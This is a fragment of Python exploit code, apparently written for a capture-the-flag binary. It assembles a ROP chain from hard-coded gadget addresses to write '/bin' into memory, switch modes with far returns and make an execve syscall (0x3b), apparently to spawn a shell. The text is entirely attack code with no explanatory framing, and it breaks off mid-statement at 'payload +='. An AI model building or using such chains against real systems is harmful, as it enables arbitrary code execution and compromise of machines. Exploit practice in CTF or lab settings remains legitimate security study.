payload = p64(0x4017d3)
#0x00000000004017d3: pop rdi; ret; 
payload += p64(0x44f1ff)+p64(0x428c4d)
# 0x0000000000428c4d: pop rcx; ret; 
payload += p64(0x80)+p64(0x40dc8e)
# 0x40dc8e: xchg ecx, eax ; retf
payload += p32(0x439b84)+p32(0x33)
# 0x0000000000439b84: stosd dword ptr [rdi], eax; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x44f070)+p64(0x428c4d)
# 0x0000000000428c4d: pop rcx; ret; 
payload += p64(0x6e69622f)+p64(0x40dc8e)
# 0x40dc8e: xchg ecx, eax ; retf
payload += p32(0x439b84)+p32(0x33)
# 0x0000000000439b84: stosd dword ptr [rdi], eax; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x44f074)+p64(0x428c4d)
# 0x0000000000428c4d: pop rcx; ret; 
payload += p64(0x68662f)+p64(0x40dc8e)
# 0x40dc8e: xchg ecx, eax ; retf
payload += p32(0x439b84)+p32(0x33)
# 0x0000000000439b84: stosd dword ptr [rdi], eax; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x44f070)+p64(0x428c4d)
# 0x0000000000428c4d: pop rcx; ret; 
payload += p64(0x36b4f014)+p64(0x40dc8e)
# 0x40dc8e: xchg ecx, eax ; retf
payload += p32(0x401553)+p32(0x33)
# 0x0000000000401553: add edx, dword ptr [rax - 0x366ffe15]; ret; 
payload += p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x428c4d)
# 0x0000000000428c4d: pop rcx; ret; 
payload += p64(0x3b)+p64(0x40dc8e)
# 0x40dc8e: xchg ecx, eax ; retf
payload += p32(0x410c8b)+p32(0x33)
# 0x0000000000410c8b: syscall; ret; 
payload +=
